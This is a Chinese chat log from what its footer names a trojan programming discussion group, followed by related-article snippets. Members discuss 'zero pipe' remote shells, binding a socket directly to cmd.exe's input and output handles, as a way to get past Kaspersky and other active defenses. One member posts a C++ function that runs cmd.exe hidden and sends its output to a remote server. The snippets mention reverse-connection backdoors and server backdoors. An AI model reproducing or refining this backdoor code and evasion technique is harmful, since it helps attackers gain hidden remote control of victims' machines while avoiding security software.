冷风
草草细说下零管道 关注........
.μρ2ц清风
这个不光过卡巴了,,,基本上所有主动防御都过!!
包口SSM,微点,,,
夕草
hot patching
.μρ2ц清风
对啊..
冷风
用socket直接替换输入输出的handle,可以实现零管道
sulwan
颠覆核心编程啊
.μρ2ц清风
反正我是用零管道的..
幻影
si.hStdInput=hrp1;
si.hStdOutput=hwp2;
幻影
是格handle
.μρ2ц清风
呵呵,,有一点点小资料,,不过看不明白!!
幻影
而socket是整形吧?
夕草
黑防有文章介绍过
夕草
socket 是 unsigned long
幻影
对啊
你的意思是
si.hStdInput=sock1;
si.hStdOutput=sock1;
sulwan
整形
Lenk
做管道通讯?
sulwan
没错
sulwan
SOCKET socket(
int af,
int type,
int protocol
);
问下,可以理解这样吗
冷风
呵呵明白了....
.μρ2ц清风
int CCmdLine::DOSShell(char *command)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR Cmdline[300]={0}; //命令行缓冲
BYTE SendBuf[2048]={0}; //发送缓冲
SECURITY_ATTRIBUTES sa; //安全描述符
DWORD bytesRead=0;
std::string strBuffer;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
//创建匿名管道
if (!CreatePipe(&hRead,&hWrite,&sa,0))
goto Clean;//失败
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; //进程(cmd)的输出写入管道
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录
strcat(Cmdline,"\\cmd.exe /c "); //拼接cmd
strcat(Cmdline,command); //拼接一条完整的cmd命令
//创建进程,也就是执行cmd命令
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
goto Clean;//失败
CloseHandle(hWrite);
while (TRUE)
{
//无限循环读取管道中的数据,直到管道中没有数据为止
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
m_hServer->Send(SendBuf,bytesRead);
memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零
Sleep(100); //休息一下
}
Clean:
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
return true;
}
幻影
这代码什么意思?
幻影
零管道?
.μρ2ц清风
零管道!!
夕草
就是把socket强制转换为handle类型
幻影
不是吧,这样能过卡吧了?
.μρ2ц清风
夕草在说什么呢??
夕草
不是过咔吧,我只是说零管道
.μρ2ц清风
呵呵,你自己测试过不过卡巴咯..
夕草
过卡巴,可以拷贝cmd.exe为abc.exe啊
幻影
(hWrite); 根本没有用啊啊
sulwan
你这样做内存消耗大吗
夕草
StartupInfo.hStdInput = (HANDLE)sclient;
幻影
可以拷贝cmd.exe为abc.exe啊--貌似没用,我这样用还是提示
.μρ2ц清风
零管道,不是我理解错了把..
只是创建一个pipe,卡巴之监控创建两个pipe的代码,,
不关socket的事!!!你拷贝CMD为其他名字一样监控..
夕草
零管道就是不用创建管道
Lenk
晚点再来。朋友们,慢慢讨论
.μρ2ц清风
他的流程是之创建CMD,然后执行命令,把管道里的数据读出来,,,关闭管道!!发送读到的数据!
.μρ2ц清风
晕,是不是我理解错了..零管道还有其他的说法??
sulwan
汗!我看我的思维是不行了!长见识了
夕草
零管道就是不用CreatePipe了
直接用socket接管输入输出句柄
.μρ2ц清风
好了,我回头再看看资料..也不用争论了,能过卡巴就是好马..哈哈!!
BlackFeather
赶紧学习···
结帖了 呵呵 零管道理解成幻影的可以吧
si.hStdInput=sock1;
si.hStdOutput=sock1;
by 木马编程技术讨论群 (44390702)
分享到:
相关推荐
本篇将深入探讨如何利用MFC通过管道(Pipe)实现CMD命令的返回串。 管道是Windows操作系统中的一种进程间通信(IPC, Inter-Process Communication)机制,它允许不同进程之间进行数据交换。在MFC中,我们可以使用...
放大镜建用户 放大镜建用户 放大镜建用户
总的来说,"vB以管道方式获取CMD命令结果"是VB编程中一种实用的技术,它允许开发者与系统进行更深入的交互,增强了VB应用程序的功能性和灵活性。通过学习和实践这种方法,你可以编写出能执行复杂系统任务的自动化...
总的来说,匿名管道是一种基础但实用的IPC技术,对于理解和开发跨进程通信的程序非常有帮助。这个项目为初学者提供了一个实践匿名管道的实例,同时也为经验丰富的开发者提供了一个扩展和优化的基础。通过深入研究和...
`管道`(Pipe)技术是`cmd`中的一个重要特性,它能够将一个命令的输出作为另一个命令的输入,从而实现命令间的连接和数据流的传递。这种技术极大地增强了命令行的灵活性和效率。本篇将深入探讨`cmd`管道技术以及如何...
总结来说,通过VC利用管道技术获取Cmd命令的输出,可以灵活地与命令行工具交互,获取实时的命令执行结果。这种方式在系统监控、自动化脚本以及需要分析命令输出的场景中非常有用。实际开发时,根据具体需求,可能还...
标题中的“cmd匿名管道重定向工程”涉及到的是在Windows操作系统环境下,使用C++编程语言实现的命令行(cmd)进程间通信(IPC)的一种技术。在这个工程中,开发者利用匿名管道来实现不同进程间的通信,通常是为了...
在IT安全领域,"清凉CMD反向连接后门"是一个具有特定含义的概念。这个标题暗示了一个利用CMD(命令提示符)实现的恶意软件,它能够建立一个反向连接,允许攻击者从远程控制受感染的系统。下面我们将深入探讨这个话题...
标签“匿名管道”表明这个主题是关于如何在编程或系统管理中利用这个机制进行进程间的数据交换。 在压缩包文件“APServer”中,可能包含了有关如何在服务器环境中应用匿名管道的例子或教程。APServer可能是一个应用...
C++使用管道获取CMD命令结果 C++使用管道获取CMD命令结果 C++使用管道获取CMD命令结果
根据提供的文件信息,这里探讨的是如何在服务器上创建一个后门,以便于远程控制或访问,这一过程通常涉及非正当的技术手段,但在合法授权的情况下,也可用于系统恢复或故障排查。以下是对“服务器后门(cmd使用)”这...
总的来说,"博乐安全网远程CmdShell远程控制匿名管道"是一个利用Windows管道通信技术的远程管理工具,它提供了丰富的功能,包括远程执行命令、读写文件、控制进程以及获取系统信息。尽管这样的工具在合法的系统管理...
本压缩包文件"完全实现CMD模拟简单版"提供了使用易语言实现CMD命令行模拟功能的源代码,帮助开发者了解和学习如何在易语言环境下操作系统底层功能。 首先,我们来详细解析这个项目中涉及的关键知识点: 1. **读...
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
总的来说,通过MFC实现CMD控制台并与之进行匿名管道通信是一项技术含量较高的任务,涉及到进程通信、C++编程、Windows API调用等多个方面。开发者需要具备扎实的MFC和C++基础,熟悉Windows编程和系统级交互,才能...
标题中的"Delphi cmd 管道"是指在Delphi编程环境中使用命令行(CMD)命令并通过管道(pipe)进行数据交互的技术。这种技术允许开发者在Delphi程序中执行DOS命令,获取命令的输出结果,或者将数据传递给命令进行处理...
在这个场景中,"vc 命令管道源码 cmd 回显"指的是使用C++编程语言,通过命令行接口(cmd)来实现命令管道的功能,并且具有回显(echo)效果的源代码。下面我们将详细探讨这些知识点。 **命令管道**是Unix和类Unix系统,...